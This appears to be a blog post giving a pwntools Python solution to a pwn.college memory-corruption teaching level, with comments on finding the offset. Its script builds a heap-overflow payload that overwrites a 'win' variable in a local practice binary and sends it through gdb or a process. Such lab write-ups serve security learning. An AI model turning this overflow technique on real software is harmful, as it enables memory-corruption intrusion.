cool head picture

UNLE⛧SH THE BEAST ト何ゼ

pwn.college Memory Corruption [level2]

Dec. 10, 2020 // echel0n

  1. #!/usr/bin/env python

  2. import pwn

  3. import subprocess

  4. import sys

  5. # this binary calls malloc() 8 times (see vuln+259)

  6. # after calling calloc() it writes its adress to rax (vuln+292)

  7. # 0x55bd462c5bb0, in my example when I try to print that address

  8. # it has 0x0 in it. we have to overwrite this with 0x1 or

  9. # something else

  10. # overwritten with daaf, i found with pwn.cyclic and pwn.cyclic_find

  11. 

  12. pwn.context.terminal = ["gnome-terminal", "-x", "sh", "-c"]

  13. FILENAME = "./babymem_level2_teaching1"

  14. 

  15. 

  16. def create_payload(options: list(), payload: list()):

  17.     f = open("payload", "wb")

  18.     for option in options:

  19.         f.write(bytes(option, encoding="utf-8") + b"\n")

  20.     f.write(payload + b"\n")

  21. 

  22. 

  23. def prepare_payload(offset: int, size_of_junk: int, junk_byte):

  24.     print("-"*24)

  25.     print(offset)

  26.     print(size_of_junk)

  27.     print("-"*24)

  28.     payload = b""

  29.     payload += junk_byte * offset

  30.     payload += b"\x65\x65\x65"

  31.     payload += junk_byte * (size_of_junk - offset)

  32.     print(payload)

  33.     print(len(payload))

  34.     return payload

  35. 

  36. 

  37. def alive_or_dead():

  38.     answer = input("[FINISHED] END? [y/n]")

  39.     is_gnome_terminal_exist = None

  40.     if "y" in answer:

  41.         is_gnome_terminal_exist = subprocess.run(

  42.             ["pgrep", "gnome-terminal"], capture_output=True).stdout

  43.         if is_gnome_terminal_exist:

  44.             is_gnome_terminal_exist = str(is_gnome_terminal_exist.decode("utf-8"))

  45.             is_gnome_terminal_exist = is_gnome_terminal_exist.split("\n")

  46.             for process in is_gnome_terminal_exist:

  47.                 subprocess.run(["kill", process])

  48.         sys.exit(0)

  49.     else:

  50.         input("[RUNNING] y/n/r/p")

  51. 

  52. 

  53. def debug_session():

  54.     # r = pwn.process(FILENAME)

  55.     ssize = 400

  56.     DEBUG_START = """

  57. break vuln

  58. continue

  59. """

  60.     r = pwn.gdb.debug(FILENAME, DEBUG_START)

  61.     read_ssize = 100000

  62.     binary_itself = pwn.ELF(FILENAME)

  63.     options = ["400"]

  64.     offset = pwn.cyclic_find("faad")

  65.     payload = prepare_payload(offset, ssize, b"\x00")

  66.     #payload = pwn.cyclic(ssize)

  67.     output = r.read(read_ssize)

  68.     print(output.decode("utf-8"))

  69. 

  70.     r.send("400" + "\n")

  71. 

  72.     output = r.read(read_ssize)

  73.     print(output.decode("utf-8"))

  74. 

  75.     r.send(payload + b"\n")

  76. 

  77.     output = r.read(read_ssize)

  78.     print(output.decode("utf-8"))

  79.     # print("-" * 24 + "| WIN VARIABLE IS AT index " + str(hex()))

  80. 

  81.     create_payload(options, payload)

  82. 

  83. 

  84. def process_session():

  85.     r = pwn.process(FILENAME)

  86.     ssize = 400

  87.     read_ssize = 100000

  88.     binary_itself = pwn.ELF(FILENAME)

  89.     options = ["400"]

  90.     offset = pwn.cyclic_find("faad")

  91.     payload = prepare_payload(offset, ssize, b"\x00")

  92.     #payload = pwn.cyclic(ssize)

  93.     output = r.read(read_ssize)

  94.     print(output.decode("utf-8"))

  95. 

  96.     r.send("400" + "\n")

  97. 

  98.     output = r.read(read_ssize)

  99.     print(output.decode("utf-8"))

  100. 

  101.     r.send(payload + b"\n")

  102. 

  103.     output = r.read(read_ssize)

  104.     print(output.decode("utf-8"))

  105.     # print("-" * 24 + "| WIN VARIABLE IS AT index " + str(hex()))

  106. 

  107.     create_payload(options, payload)

  108. 

  109. 

  110. def main():

  111.     debug_session()

  112. 

  113. 

  114. if __name__ == "__main__":

  115.     main()

  116.     while True:

  117.         alive_or_dead()